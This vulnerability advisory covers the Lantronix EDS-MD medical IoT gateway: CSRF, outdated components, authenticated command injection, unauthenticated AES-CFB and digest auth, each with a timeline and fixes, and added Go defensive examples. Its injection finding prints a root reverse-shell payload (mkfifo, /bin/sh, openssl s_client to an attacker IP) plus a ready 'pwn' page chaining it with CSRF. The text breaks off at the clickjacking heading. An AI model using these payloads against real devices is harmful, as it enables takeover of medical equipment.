Multiple vulnerabilities in Lantronix EDS-MD IoT gateway for medical devices
Pentagrid identified several vulnerabilities in Lantronix's EDS-MD product during a penetration test. The EDS-MD is an IoT gateway for medical devices and equipment. The vulnerabilities include an authenticated command injection, cross-site request forgery, missing authentication for the AES-encrypted communication, cross-site scripting vulnerabilities, outdated software components, and more.
The EDS-MD product is an embedded device. More specifically, according to the Lantronix website for the EDS-MD:
A wired IoT gateway for mission critical medical devices and equipment connectivity. Key features:
- UL and IEC-60601 compliance provides galvanic port isolation to protect connected medical devices
- Securely connect any medical device with a serial interface to the network using enterprise-level SSL and SSH
- Simple set up and configuration with industry-standard management tools including Web, CLI, XML
- Centralized Management via ConsoleFlow™
- Gigabit Ethernet offers increased bandwidth for higher performance
- Available with 4, 8 or 16 ports
Timeline
2023-10-09: Vulnerabilities found. No security.txt (RFC 9116) or DNS security TXT record found to contact Lantronix. Initial vendor contact via securitymatters@lantronix.com as found on the Security Updates page of Lantronix.
2023-10-10: Lantronix responds to initial contact. Pentagrid sends detailed advisory.
2023-10-12: Pentagrid asks for advisory receipt confirmation.
2023-10-13: Lantronix confirms receiving the advisory details.
2023-11-13: Pentagrid asks for status update.
2023-11-15: Lantronix responds that they reviewed our report and are discussing the next steps internally. They will send an update in the next couple of days.
2023-11-22: Lantronix responds that they plan to fix all issues in the January 12, 2024 release, except the vulnerable old components used, as they regard the product as a legacy product based on a processor that has been declared EOL by its vendor (planned to be superseded in Q1/Q2 2024 by a next-generation product).
2023-11-29: Lantronix asks for details about the AES-encrypted connection vulnerability.
2023-12-04: Pentagrid responds that while the device might use TLS for the administrative web interface, the data forwarding for incoming serial bus communication (business logic) of the device was only using the mentioned unauthenticated AES cipher mode.
2023-01-05: Pentagrid asks for a mapping of individual fixes to firmware versions.
2024-01-08: Public disclosure.
2024-01-08: Lantronix changes the release plan and writes that the next release is planned for January 31, 2024 and that only the three issues "Clickjacking", "Missing authentication on AES-encrypted connection" and "Authenticated Stored Cross-Site Scripting (XSS) via File-Download" will be fixed (in addition to the two already fixed in 8.5.0.0R1).
2024-02-02: Pentagrid asks Lantronix for a status, because the website was not updated and still showed version 8.5.0.0R1 from November as the latest release.
2024-02-05: Lantronix responds that the new release will be labelled version 8.6.0.0 and will be available by the end of the week.
2024-02-07: Lantronix releases version 8.6.0.0R2.
2024-02-08: Pentagrid asks if there are fixes planned for the two remaining issues "Cross-Site Request Forgery" and "Missing Lantronix Content Security Policy".
2024-02-11: Lantronix responds that they are investigating, but given that it is an old legacy product (that will be superseded by another product coming in Q2 2024), the outlook to fix these two issues is not promising/feasible.
Affected Components
Lantronix's EDS-MD product with the firmware 8.4.0.0R1 is affected. While the webpage specifies that a login is necessary to download the firmware, it can be found on Lantronix's Confluence page.
1. Cross-Site Request Forgery
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H, 8.8 High
Summary
The web interface of the Lantronix box is not protected against Cross-Site Request Forgery attacks. No CVE has been assigned to this vulnerability yet.
Impact
If the preconditions are met, the attacker can indirectly perform all actions available on the Lantronix IoT gateway, such as enabling SSH/Telnet, changing the password, disabling authentication, uploading files, or exploiting the command injection vulnerability documented in this advisory to execute unrestricted commands as root on the Linux operating system.
Technical details
An attacker could host the following HTML code on his website.
<html>
<body>
The author of this code is not responsible for any damage caused by the use or misuse of this PoC exploit. This PoC is intended for educational and research purposes only, and should never be used to target or exploit systems without explicit permission from the owner.
<script>
function submitRequest() {
  var xhr = new XMLHttpRequest();
  xhr.open("POST", "http:\/\/192.168.183.43\/fs", true);
  xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundaryoD0vrnoSvVP2UbaB");
  xhr.withCredentials = true;
  var body = "------WebKitFormBoundaryoD0vrnoSvVP2UbaB\r\n" +
    "Content-Disposition: form-data; name=\"cwd\"\r\n" +
    "\r\n" +
    "/\r\n" +
    "------WebKitFormBoundaryoD0vrnoSvVP2UbaB\r\n" +
    "Content-Disposition: form-data; name=\"selectedfile\"; filename=\"test.txt\"\r\n" +
    "Content-Type: text/plain\r\n" +
    "\r\n" +
    "fooo\r\n" +
    "------WebKitFormBoundaryoD0vrnoSvVP2UbaB\r\n" +
    "Content-Disposition: form-data; name=\"iehack\"\r\n" +
    "\r\n" +
    "\r\n" +
    "------WebKitFormBoundaryoD0vrnoSvVP2UbaB\r\n" +
    "Content-Disposition: form-data; name=\"submit\"\r\n" +
    "\r\n" +
    "Upload\r\n" +
    "------WebKitFormBoundaryoD0vrnoSvVP2UbaB--\r\n";
  var aBody = new Uint8Array(body.length);
  for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i);
  xhr.send(new Blob([aBody]));
}
submitRequest();
</script>
</body>
</html>
After an administrator who is currently logged in to the Lantronix box at 192.168.183.43 (example IP address) visits the attacker's website, a new file called test.txt is uploaded.
Another example is the following code, which changes the administrator's password to "bbb" and enables SSH and Telnet:
<html>
<body>
The author of this code is not responsible for any damage caused by the use or misuse of this PoC exploit. This PoC is intended for educational and research purposes only, and should never be used to target or exploit systems without explicit permission from the owner.
<form action="http://192.168.183.43/" method="POST">
  <input type="hidden" name="ajax" value="CliConfigPost" />
  <input type="hidden" name="new_Cli.Login_Password" value="bbb" />
  <input type="hidden" name="new_Cli.Enable_Level_Password" value="" />
  <input type="hidden" name="new_Cli.Quit_Connect_Line" value="<control>L" />
  <input type="hidden" name="new_Cli.Inactivity_Timeout" value="15" />
  <input type="hidden" name="new_Cli.Line_Authentication" value="Enabled" />
  <input type="hidden" name="new_CliTelnet.State" value="Enabled" />
  <input type="hidden" name="new_CliTelnet.Port" value="23" />
  <input type="hidden" name="new_CliTelnet.Max_Sessions" value="3" />
  <input type="hidden" name="new_CliTelnet.Authentication" value="Disabled" />
  <input type="hidden" name="new_CliSsh.State" value="Enabled" />
  <input type="hidden" name="new_CliSsh.Port" value="22" />
  <input type="hidden" name="new_CliSsh.Max_Sessions" value="3" />
  <input type="hidden" name="confirms" value="" />
  <input type="hidden" name="submit" value="Submit" />
  <input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
The exploit works because Lantronix uses browser-supplied authentication (no authentication, basic authentication or digest authentication). The browser adds the required authentication information to every request.
While this kind of attack used to work with cookie-based authentication, modern browsers protect cookies with the SameSite flag by default, making Cross-Site Request Forgery impossible in many cases. However, Lantronix does not use cookie-based authentication.
Precondition
Cross-Site Request Forgery has multiple preconditions. An attacker has to know the IP address or DNS name of the Lantronix box they would like to attack. Additionally, an administrator who is currently logged in to the Lantronix box has to visit the attacker's website, where the prepared HTML/JavaScript code is hosted. However, as the request is not visible to the attacked user, an attacker could send such requests to entire ranges of IP addresses. An attacker also needs to implement their own pingback for successful exploitation, as the Same-Origin Policy prevents the attacker's origin from reading whether an attack succeeded.
Recommendation
It is recommended for Lantronix to:
Include a non-predictable Cross-Site Request Forgery token in every POST request (state changing requests) on the Lantronix IoT gateway and validate the token before accepting the request.
As the Lantronix web server is stateless (no sessions), an alternative mechanism that proves the request is not cross-origin could be used, for example the "Naive Double Submit Cookie" approach. In this scenario, all requests are preprocessed in browser-side JavaScript, which sends a non-predictable token (e.g. a newly generated long random token) in the POST data and the same token in an HTTP cookie. The web server verifies for all POST requests that the value in the HTTP Cookie header and the value in the POST data match, and otherwise rejects the request. As cross-origin requests are not allowed to set arbitrary HTTP cookies for the target domain, such a mechanism proves that the request is same-origin.
Please note that, as Lantronix uses basic or digest browser-based authentication (and not cookie-based authentication), the modern SameSite cookie flag does not apply as a prevention mechanism, but the flag could be set on the cookie used in the "Naive Double Submit Cookie" approach.
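The following Go program is an added example (not Lantronix code) of the stateless double-submit check described above, written against Go's standard net/http package: a random token is issued in a cookie that page-side JavaScript is expected to copy into every POST body, and a wrapper rejects any state-changing request whose cookie and form values do not match. The cookie name, the form field name and the handler layout are assumptions made for this example.

```go
package main

import (
	"crypto/rand"
	"crypto/subtle"
	"encoding/hex"
	"fmt"
	"log"
	"net/http"
)

// Hypothetical names (example, not Lantronix code): the cookie and the form
// field that carry the double-submit token.
const (
	csrfCookieName = "csrf_token"
	csrfFieldName  = "csrf_token"
	csrfTokenBytes = 32 // 256 bits of randomness, hex encoded below
)

// newCSRFToken returns a fresh, non-predictable token.
func newCSRFToken() (string, error) {
	b := make([]byte, csrfTokenBytes)
	if _, err := rand.Read(b); err != nil {
		return "", err
	}
	return hex.EncodeToString(b), nil
}

// issueCSRFCookie sets the token cookie. It is deliberately not HttpOnly:
// the page's own JavaScript reads it and copies it into every POST body.
// SameSite=Strict is the extra layer the advisory mentions; it costs nothing
// here even though the device's authentication itself is not cookie based.
func issueCSRFCookie(w http.ResponseWriter) (string, error) {
	tok, err := newCSRFToken()
	if err != nil {
		return "", err
	}
	http.SetCookie(w, &http.Cookie{
		Name:     csrfCookieName,
		Value:    tok,
		Path:     "/",
		SameSite: http.SameSiteStrictMode,
		HttpOnly: false,
	})
	return tok, nil
}

// validCSRF reports whether a state-changing request carries the same token
// in its cookie and in its POST body. A cross-site page can submit a POST
// body, but it cannot set a cookie for the device's origin, so a match
// proves the request was prepared by the device's own page.
func validCSRF(r *http.Request) bool {
	c, err := r.Cookie(csrfCookieName)
	if err != nil || len(c.Value) != 2*csrfTokenBytes {
		return false
	}
	field := r.PostFormValue(csrfFieldName) // handles urlencoded and multipart bodies
	if len(field) != len(c.Value) {
		return false
	}
	return subtle.ConstantTimeCompare([]byte(field), []byte(c.Value)) == 1
}

// csrfProtect wraps a handler: safe methods pass, everything else needs a valid token.
func csrfProtect(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		switch r.Method {
		case http.MethodGet, http.MethodHead, http.MethodOptions:
			next.ServeHTTP(w, r)
			return
		}
		if !validCSRF(r) {
			http.Error(w, "missing or mismatched CSRF token", http.StatusForbidden)
			return
		}
		next.ServeHTTP(w, r)
	})
}

func main() {
	mux := http.NewServeMux()
	// GET issues a token; POST stands in for a configuration change such as
	// the CliConfigPost request shown above.
	mux.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
		if r.Method == http.MethodPost {
			fmt.Fprintf(w, "accepted ajax=%s\n", r.PostFormValue("ajax"))
			return
		}
		tok, err := issueCSRFCookie(w)
		if err != nil {
			http.Error(w, "token generation failed", http.StatusInternalServerError)
			return
		}
		fmt.Fprintf(w, "copy this token into every POST body as %s=%s\n", csrfFieldName, tok)
	})
	log.Fatal(http.ListenAndServe("127.0.0.1:8080", csrfProtect(mux)))
}
```

A GET to http://127.0.0.1:8080/ receives the token; a POST without the matching csrf_token cookie and field, which is all a cross-site page can produce, is answered with 403. The token length is checked before the constant-time comparison, so an empty cookie paired with an empty field does not pass either.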
2. Vulnerable old components used in Lantronix software
CVSS:3.1, 0.0 Information
Summary
The Lantronix IoT gateway uses outdated software with known vulnerabilities.
Impact
The various vulnerabilities have different impacts that have not been analysed in depth, but it is estimated that some of them have an impact on the device.
Technical details
The latest release of the gateway OS for the Lantronix IoT gateway at the time of testing was version 8.4.0.0R1 and can be downloaded on the Lantronix Confluence page.
The firmware was released in 2022. However, the firmware (Linux OS) includes various software components that are much older, for example:
BusyBox v1.16.1
CLIENT libcurl 7.36.0
EXT2FS Library version 1.41.11
GNU C Library (Sourcery G++ Lite 2009q1-203) stable release version 2.8
GNU sed version 4.0
Linux-2.6.31
Modern traceroute for Linux, version 2.0.18
OpenSSL 1.0.2i
SERVER: UPnP/1.1 MiniUPnPd/1.9
dnsmasq-2.70
dosfsck 3.0.3
ethtool version 6
iperf version 2.0.5
libcurl/7.36.0
libpcap version 1.0.0
libpcre.so.0.0.1
lspci version 3.1.7
ltrace version 0.5.
nginx version: nginx/1.6.1
setpci version 3.1.7
udhcp 1.16.1
vsftpd: version 2.0.7
For example, OpenSSL 1.0.2 is out of support since 1st January 2020 and is no longer receiving updates.
As another example, the firmware uses the webserver nginx in version 1.6.1 which was released in August 2014. This version of nginx is vulnerable to the following issues:
CVE-2014-3616
CVE-2016-0747
CVE-2016-0746
CVE-2016-0742
CVE-2016-4450
CVE-2017-7529
CVE-2018-16845
CVE-2021-23017
CVE-2022-41742
CVE-2022-41741
The Linux kernel was released 14 years ago in 2009 and has many vulnerabilities published.
As there is no point in manually searching further for vulnerabilities, the EMBA firmware analyser was used and printed the following summary:
[+] Identified 1779 CVE entries.
    Identified 547 High rated CVE entries / Exploits: 194
    Identified 1051 Medium rated CVE entries / Exploits: 177
    Identified 181 Low rated CVE entries /Exploits: 25
    396 possible exploits available (13 Metasploit modules).
    Remote exploits: 4 / Local exploits: 35 / DoS exploits: 14 / Github PoCs: 307 / Known exploited vulnerabilities: 6 / Verified Exploits: 0
Pentagrid did not confirm if any of the issues are exploitable on the Lantronix IoT gateway.
Precondition
One of the vulnerabilities has to be exploitable to have an impact on the security of the Lantronix IoT gateway.
Recommendation
It is recommended for Lantronix to:
Update components of the firmware on a regular basis and keep the latest firmware release up to date.
3. Authenticated Command Injection
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:H/A:L, 8.2 High
Summary
A user who has access to the Lantronix web interface can execute arbitrary commands as root on the underlying Linux machine. No CVE has been assigned to this vulnerability yet.
Impact
Users of the web interface can circumvent the Lantronix enable command and the restricted shell to gain full root command execution on the underlying Linux machine. This gives full access to all binaries and therefore simplifies reverse engineering how Lantronix operates the device or finding other security issues. For example, the user's password can be found in cleartext in the file /ltrx_private/cfg/hidden.config on the internal filesystem.
Technical details
The functionality to generate a new TLS certificate is prone to command injection:
POST / HTTP/1.1
Host: 192.168.183.43
Content-Length: 174
Authorization: Basic REDACTED
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http://192.168.183.43
Referer: http://192.168.183.43/?x=k8pgpswk
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close

ajax=SslGenerateCertificate&c=ch&s=bb&l=bb&o=bb&ou=bb&cn=bbbbbbb'||ping -c 1 192.168.183.11 #&expires=01%2F01%2F2026&keytype=DSA&bits=512&submit=Submit&sslcredentialname=abbb
The IP address 192.168.183.11 then receives ICMP echo requests (pings), meaning the ping command was executed on the device.
By using the openssl command that is present on the device and used to create the certificate, we can obtain a remote shell with full access to the Lantronix device as the Linux user root:
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.183.11:4444 > /tmp/s; rm /tmp/s
Or as an HTTP request:
POST / HTTP/1.1
Host: 192.168.183.43
Content-Length: 493
Authorization: Basic REDACTED
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http://192.168.183.43
Referer: http://192.168.183.43/?x=k8pgpswk
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close

ajax=SslGenerateCertificate&c=ch&s=bb&l=bb&o=bb&ou=bb&cn=bbbbbbb'|| %6d%6b%66%69%66%6f%20%2f%74%6d%70%2f%73%3b%20%2f%62%69%6e%2f%73%68%20%2d%69%20%3c%20%2f%74%6d%70%2f%73%20%32%3e%26%31%20%7c%20%6f%70%65%6e%73%73%6c%20%73%5f%63%6c%69%65%6e%74%20%2d%71%75%69%65%74%20%2d%63%6f%6e%6e%65%63%74%20%31%39%32%2e%31%36%38%2e%31%38%33%2e%31%31%3a%34%34%34%34%20%3e%20%2f%74%6d%70%2f%73%3b%20%72%6d%20%2f%74%6d%70%2f%73 #&expires=01%2F01%2F2026&keytype=DSA&bits=512&submit=Submit&sslcredentialname=abbb
On the attacker side we just have to listen for the back-connect and then get an interactive shell:
attacker% ncat --ssl -vv -l -p 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: C86D 6F63 B9C0 9050 9A51 A7F3 D8F9 748D 22F4 F497
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 192.168.183.43.
Ncat: Connection from 192.168.183.43:34902.
/bin/sh: can't access tty; job control turned off
/ # ls
bin  boot  config  defaults  dev  etc  home  http  lib  linuxrc  lost+found  ltrx_private  ltrx_user  mnt  opt  proc  root  sbin  sys  tmp  usr  var
/ # whoami
root
/ # pwd
/
From this perspective we can see how the injection took place as the subprocess is still running (the HTTP request never returned a response):
/ # ps waux
PID   USER     COMMAND
    1 root     init
    2 root     [kthreadd]
[...]
  580 root     /sbin/getty -L ttyS0 115200 vt100
  604 root     /bin/sh /etc/init.d/S71ntpd start
  631 root     /bin/fwupgrade -c -l -r -s -w -f /tmp/firmware.rom -b E6
  647 root     /usr/sbin/inetd -f /etc/inetd.conf
  658 root     /bin/emaild
  659 root     /bin/alarmd
  715 root     nginx: master process nginx -c /etc/nginx.conf
[...]
  727 root     /bin/pw_fuse_fs /ltrx_user/pwxcr -o allow_other
 1043 root     udhcpc --interface=eth0 -t 5 -A 10 -S -s /usr/share/udhcpc/ltrx-dhcp.script -p /var/run/udhcpc.eth0.pid -i eth0
 1063 default  avahi-autoipd: [eth0] sleeping
 1064 root     avahi-autoipd: [eth0] callout dispatcher
 4635 root     sh -c openssl req -x509 -nodes -days 20448 -subj '/C=ch/ST=bb/L=bb/O=bb/OU=bb/CN=bbbbbbb'|| mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.183.11:4444 > /tmp/s; rm /tmp/s #' -set_serial 2 -newkey dsa:/tmp/ssl_dsaparams_12431_12451 -keyout /tmp/ssl_12431_12451.key -out /tmp/ssl_12431_12451
 4656 root     /bin/sh -i
 4657 root     openssl s_client -quiet -connect 192.168.183.11 4444
 5573 root     /bin/sh /etc/init.d/S71ntpd start
 5577 root     /usr/sbin/ntpd -p 0.pool.ntp.org
 5578 root     ps waux
12431 root     /bin/ltrx_evo
29657 root     /sbin/syslogd -L -n -l 7 -m 0 -C512 -O /ltrx_user/log.txt -s 500 -b 0
29658 root     /sbin/klogd -n -c 1
This also leads to the conclusion that the web server is running as root, like all other processes.
The following proof-of-concept HTML code can be used to demonstrate this issue combined with the Cross-Site Request Forgery (see finding 1):
<html>
<body>
This is a Proof of Concept exploit for two vulnerabilities in Lantronix EDS-MD: A generic Cross-Site Request Forgery combined with an authenticated command injection. The author of this code is not responsible for any damage caused by the use or misuse of this PoC exploit. This PoC is intended for educational and research purposes only, and should never be used to target or exploit systems without explicit permission from the owner.<br>
Steps to pwn:<br>
1) Log into Lantronix in this browser in another tab<br>
2) Enter the URL of the Lantronix box as a target below<br>
3) Start reverse shell on your computer with "ncat --ssl -vv -l -p 4444" (ncat is part of <a href="https://nmap.org/ncat/">nmap</a>)<br>
4) Enter your reverse shell IP below<br>
5) Press the submit button<br>
Reverse shell IP (your IP): <input type="text" name="target" id="reverseip" value="192.168.1.99"><br>
Target Lantronix box: <input type="text" name="target" id="target" value="http://192.168.1.98/"><br>
<form action="http://192.168.1.12/" method="POST">
  <input type="hidden" name="ajax" value="SslGenerateCertificate" />
  <input type="hidden" name="c" value="ch" />
  <input type="hidden" name="s" value="bb" />
  <input type="hidden" name="l" value="bb" />
  <input type="hidden" name="o" value="bb" />
  <input type="hidden" name="ou" value="bb" />
  <input type="hidden" name="cn" id="payload" value="bbbbbbb'|| mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.1.88:4444 > /tmp/s; rm /tmp/s #" />
  <input type="hidden" name="expires" value="01/01/2026" />
  <input type="hidden" name="keytype" value="DSA" />
  <input type="hidden" name="bits" value="512" />
  <input type="hidden" name="sslcredentialname" value="abbb" />
  <input type="submit" value="pwn" style="display:none" />
</form>
<form>
  <input type="submit" value="pwn" />
</form>
<script>
document.forms[1].addEventListener("submit", (e) => {
  e.preventDefault();
  document.forms[0].action = document.getElementById('target').value;
  var payload = document.getElementById('payload');
  payload.value = payload.value.replace('192.168.1.88', document.getElementById('reverseip').value);
  //console.log("payload: " + document.getElementById('payload').value);
  //console.log("action: " + document.forms[0].action);
  document.forms[0].submit();
});
</script>
</body>
</html>
Precondition
An attacker needs access to the administrative web interface.
While this is unlikely if authentication is enabled, this issue simplifies the exploitation of the Cross-Site Request Forgery issue (see finding 1), by gaining command execution on the Lantronix box via Cross-Site Request Forgery. In this case the preconditions of the Cross-Site Request Forgery apply instead.
Recommendation
It is recommended for Lantronix to:
Avoid passing arguments to a shell, or do not use shell execution at all.
Filter user input according to an allowed-characters approach.
Escape shell arguments correctly.
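An added example (not Lantronix code) in Go of the three recommendations above: the subject fields of the SslGenerateCertificate request are checked against an allow-list of characters, the openssl invocation is built as an argument vector with no shell involved, and the string-interpolated sh -c pattern visible in the ps output above is kept as a short contrast function. The struct, the function names, the fixed key type and the output paths are assumptions made for this example.

```go
package main

import (
	"fmt"
	"os/exec"
	"regexp"
	"strings"
)

// certRequest mirrors the form parameters of the SslGenerateCertificate
// request (c, s, l, o, ou, cn); the type itself is a constructed example.
type certRequest struct {
	C, S, L, O, OU, CN string
}

// Allowed-characters approach: each subject field may only contain letters,
// digits, space, dot, dash and underscore. Quotes, slashes, semicolons, pipes
// and similar shell or X.509 metacharacters are rejected rather than escaped,
// so neither the shell nor the subject DN structure can be influenced.
var subjectFieldRe = regexp.MustCompile(`^[A-Za-z0-9 ._-]{1,64}$`)

// buildSubject validates every field and assembles the OpenSSL -subj value.
func buildSubject(req certRequest) (string, error) {
	fields := []struct{ key, val string }{
		{"C", req.C}, {"ST", req.S}, {"L", req.L}, {"O", req.O}, {"OU", req.OU}, {"CN", req.CN},
	}
	var b strings.Builder
	for _, f := range fields {
		if !subjectFieldRe.MatchString(f.val) {
			return "", fmt.Errorf("subject field %s contains disallowed characters", f.key)
		}
		fmt.Fprintf(&b, "/%s=%s", f.key, f.val)
	}
	return b.String(), nil
}

// certCommand builds the openssl invocation as an argument vector. No shell
// parses the command line, so even a value that slipped past validation would
// reach openssl as one argument rather than as a command. Key type and
// validity are fixed here; keyOut and certOut are constructed placeholders.
func certCommand(req certRequest, keyOut, certOut string) (*exec.Cmd, error) {
	subj, err := buildSubject(req)
	if err != nil {
		return nil, err
	}
	args := []string{
		"req", "-x509", "-nodes", "-days", "365",
		"-subj", subj,
		"-newkey", "rsa:2048",
		"-keyout", keyOut,
		"-out", certOut,
	}
	return exec.Command("openssl", args...), nil
}

// unsafeCommandLine shows the pattern behind this finding for contrast: the
// subject is interpolated into one string handed to `sh -c`, so a single quote
// in CN terminates the -subj argument and the remainder is parsed by the shell.
func unsafeCommandLine(req certRequest) string {
	return fmt.Sprintf("openssl req -x509 -nodes -subj '/C=%s/ST=%s/L=%s/O=%s/OU=%s/CN=%s'",
		req.C, req.S, req.L, req.O, req.OU, req.CN)
}

func main() {
	good := certRequest{C: "ch", S: "bb", L: "bb", O: "bb", OU: "bb", CN: "gateway-01"}
	bad := certRequest{C: "ch", S: "bb", L: "bb", O: "bb", OU: "bb", CN: "bbbbbbb'|| true #"}
	for _, req := range []certRequest{good, bad} {
		cmd, err := certCommand(req, "/tmp/example.key", "/tmp/example.crt")
		if err != nil {
			fmt.Println("rejected:", err)
			continue
		}
		fmt.Println("argv:", cmd.Args)
	}
	fmt.Println("unsafe pattern for contrast:", unsafeCommandLine(bad))
}
```

The allow-list is the first line of defence and the argument vector the second; the example deliberately does not try to escape quotes, because escaping for one shell dialect is exactly the kind of code that breaks when the device's BusyBox shell differs from the one the escaping was written for.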
4. Missing authentication on AES-encrypted connection
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N, 5.9 Medium
Summary
As the Lantronix IoT gateway only uses AES CFB encryption without authentication, an attacker can manipulate data without being detected. No CVE has been assigned to this vulnerability yet.
Impact
An attacker can feed manipulated data into the receiving machine.
Technical details
No TLS is used between the Lantronix IoT gateway and the receiving end, only AES CFB encryption.
An attacker can flip a bit in the cleartext by flipping the same bit in the ciphertext. In general, this allows arbitrary modification of the sent data.
Usually, an application sends and parses distinct messages, so the receiving application is coded to parse single messages. The underlying AES encryption, however, operates on blocks, and a message might consist of several blocks.
A side effect is that the next AES block (128 bit = 16 bytes) is garbled (the resulting changes are unpredictable to the attacker, as they do not know the secret key). An attacker can work around this by modifying only the last block of a message (so that only the start of the next message is corrupted) or by finding a place in a message where a random corruption of the next AES block does not matter.
Precondition
An attacker has to be in a Machine-In-The-Middle (MITM) position to conduct the attack. The attacker needs to know the length of the messages and the locations where a bit flip should happen. Additionally, the attacker has to correlate AES cipher blocks with application messages, so that either the last block of a message is attacked or a block where the corruption of the following block does not matter.
Recommendation
It is recommended for Lantronix to:
Check whether a new version could offer TLS or TLS-PSK to customers, which provides a complete solution covering many security aspects.
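An added example (not Lantronix code) in Go of the malleability described in this finding, using the standard library's 128-bit AES-CFB mode (an assumption about the device's exact feedback size) with a constructed key and a constructed two-block "serial" message: inverting one ciphertext bit inverts the same plaintext bit and garbles the following block, while inverting a bit in the last block changes only that one byte. AES-GCM is used here as a stand-in for the authenticated transport that the recommended TLS would provide, to show the tampered message being rejected instead of decrypted.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"errors"
	"fmt"
	"io"
)

// cfbEncrypt returns IV || AES-CFB(plaintext): confidentiality only, no
// integrity, which is the mode the advisory describes for the serial data path.
func cfbEncrypt(key, plaintext []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	out := make([]byte, aes.BlockSize+len(plaintext))
	if _, err := io.ReadFull(rand.Reader, out[:aes.BlockSize]); err != nil {
		return nil, err
	}
	cipher.NewCFBEncrypter(block, out[:aes.BlockSize]).XORKeyStream(out[aes.BlockSize:], plaintext)
	return out, nil
}

// cfbDecrypt is the receiving side: it has no way to tell a modified
// ciphertext from a genuine one.
func cfbDecrypt(key, ct []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	if len(ct) < aes.BlockSize {
		return nil, errors.New("ciphertext shorter than IV")
	}
	pt := make([]byte, len(ct)-aes.BlockSize)
	cipher.NewCFBDecrypter(block, ct[:aes.BlockSize]).XORKeyStream(pt, ct[aes.BlockSize:])
	return pt, nil
}

// flipCiphertextBit returns a copy of ct with one bit of the ciphertext byte
// at plaintext offset off inverted. In CFB this inverts the same plaintext
// bit; because that ciphertext block is fed back into the cipher, the entire
// following 16-byte block then decrypts to unpredictable bytes.
func flipCiphertextBit(ct []byte, off int, bit uint) []byte {
	mod := append([]byte(nil), ct...)
	mod[aes.BlockSize+off] ^= 1 << bit
	return mod
}

// gcmSeal and gcmOpen: authenticated encryption, standing in for what TLS
// provides on the wire. Any modification makes Open fail instead of
// yielding altered plaintext.
func gcmSeal(key, plaintext []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	aead, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, aead.NonceSize())
	if _, err := io.ReadFull(rand.Reader, nonce); err != nil {
		return nil, err
	}
	return aead.Seal(nonce, nonce, plaintext, nil), nil
}

func gcmOpen(key, ct []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	aead, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	ns := aead.NonceSize()
	if len(ct) < ns {
		return nil, errors.New("ciphertext shorter than nonce")
	}
	return aead.Open(nil, ct[:ns], ct[ns:], nil)
}

// Constructed demo values: a placeholder key and a 32-byte (two-block)
// message of the kind a serial medical device might emit.
var (
	demoKey = []byte("0123456789abcdef")
	demoMsg = []byte("DOSE=010 mg/h   PATIENT=0042    ")
)

func main() {
	ct, _ := cfbEncrypt(demoKey, demoMsg)
	// Flip bit 0 of byte 5 ('0' 0x30 -> '1' 0x31): the dose field changes, block 2 is garbled.
	pt, _ := cfbDecrypt(demoKey, flipCiphertextBit(ct, 5, 0))
	fmt.Printf("CFB, flip in first block: %q\n", pt)
	// Flip in the last block: only that byte changes, nothing follows to be corrupted.
	pt, _ = cfbDecrypt(demoKey, flipCiphertextBit(ct, 24, 0))
	fmt.Printf("CFB, flip in last block:  %q\n", pt)
	sealed, _ := gcmSeal(demoKey, demoMsg)
	sealed[12+5] ^= 1 // same single-bit change, now inside an authenticated ciphertext
	_, err := gcmOpen(demoKey, sealed)
	fmt.Println("GCM, tampered message rejected:", err)
}
```

The first decryption shows why the precondition above matters: the attacker-chosen change lands exactly where intended, but the garbled second block is what a parser would trip over, which is why the advisory says the last block of a message is the natural target. The GCM call fails closed with an error, which is the behaviour a TLS record layer gives the receiving end for free.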
5. HTTP digest authentication prevents logout
CVSS:3.1, 0.0 Information
Summary
The used authentication mechanism on the Lantronix administrative web interface has disadvantages such as no working logout mechanism.
Impact
Attackers are more likely to find an authenticated browser on a compromised machine, as a logout from the Lantronix web interface is only possible by closing the browser completely.
Technical details
The Lantronix IoT gateway can use HTTP basic, digest or no authentication. HTTP digest and basic authentication are handled by the browser, and there is usually no logout possible (except by closing the browser).
HTTP digest authentication provides only little benefit over HTTP basic authentication. The much more important factor is the use of TLS on the web interface in any case. HTTP digest authentication is weak as it uses MD5, a hash function for which very fast password cracking approaches are available, and therefore the password has to be very strong.
Precondition
An attacker first has to compromise a machine where a login to the Lantronix web interface took place or be in a MITM position to exploit the issue.
Recommendation
It is recommended for Lantronix to:
Provide a stronger authentication method on the web interface.
6. Clickjacking
